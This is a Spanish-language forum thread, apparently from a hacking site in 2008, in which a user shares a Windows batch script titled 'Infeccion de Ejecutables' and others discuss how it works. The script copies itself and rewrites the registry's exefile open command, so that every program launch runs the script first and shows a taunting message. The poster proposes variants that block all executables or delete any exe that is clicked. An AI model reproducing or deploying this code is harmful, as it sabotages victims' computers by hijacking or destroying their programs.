miren... yo el code que tengo es mas o menos el siguiente
@echo off
title Infeccion de Ejecutables
if exist "%windir%\system32\exer.bat" (goto yes) else (goto main)
:main
copy %0
reg add HKCR\exefile\shell\open\command /ve /t REG_SZ /d exer.bat %%1 %%* /f
exit
:yes
msg /w * Te tengo ;)
call %1 (opcional)
exit
aunque tambien se puede poner solo un nombre de archivo... que muestre un mensaje de error y se salga... asi le provocara que se salga de sus cabales :P :P, yo mismo me infecte y casi que me tiro d euna ventana ;D
el codigo es asi como lo postee, el objetivo mio es que cuando el usuario intente abrir un programa le salga un mensaje ( al azar (http://foro.elhacker.net/scripting/mensaje_al_azaren_batch-t211119.0.html), o predefinido "powered by...") y que se salga
esto podria ser usado con varios fines, que le muestre el error y se salga, o que le muestre otro mensaje y posteriormente abra el programa, o que borre cualquier exe que sea clicado >:D >:D
solo es una idea, si esta mal... por favor me corrigen
Saludos.
Perdona mi ignorancia, pero aver si entendí el code:
@echo off
title Infeccion de Ejecutables
if exist "%windir%\system32\exer.bat" (goto yes) else (goto main)
Hasta aca todo bien
:main
copy %0
reg add HKCR\exefile\shell\open\command /ve /t REG_SZ /d exer.bat %%1 %%* /f
exit
Esto lo que hace es copiar el bat (exer.bat) en la carpeta system32 (copy %0) y la linea del registro sirve para que cada vez que se ejecute un programa se ejecute previamente el bat?
:yes
msg /w * Te tengo ;)
call %1 (opcional)
exit
Bueno, esto saca un mensaje que dice te tengo y posteriormente habre el bat de vuelta, nada nuevo :)
Deberias cambiar el titulo, esto no tiene nada que ver con infectar un ejecutable.
Cita de: ^Arkangel^ en 5 Mayo 2008, 20:22 PM
Bueno, esto saca un mensaje que dice te tengo y posteriormente habre el bat de vuelta, nada nuevo :)
Pues si lo entendiste, pero no llama nuevamente al bat, sino que llama al ejecutable...
osea, este se agrega al registro, y cuando intenten abrir un programa se abrira es nnuestro code, entonces sale el mensaje, y la opcinal es que despues abar el programa al que se quiso llamar, osea el que se pasa al code con el parametro %1, si no ponemos esto, entonces simplemente no deja abrir ningun ejecutable...
Entiendes ??
Saludos.
Roger that ;D
Cita de: Chino Moreno en 5 Mayo 2008, 20:36 PM
Deberias cambiar el titulo, esto no tiene nada que ver con infectar un ejecutable.
estoy con el :P
Pues i se habran dado cuenta dice"Posible"... no que realmente lo sea, pero se encarga de deshabilitar ejecutables, como si estuviesen infectado...
mas o menos esa era la idea.
Saludos.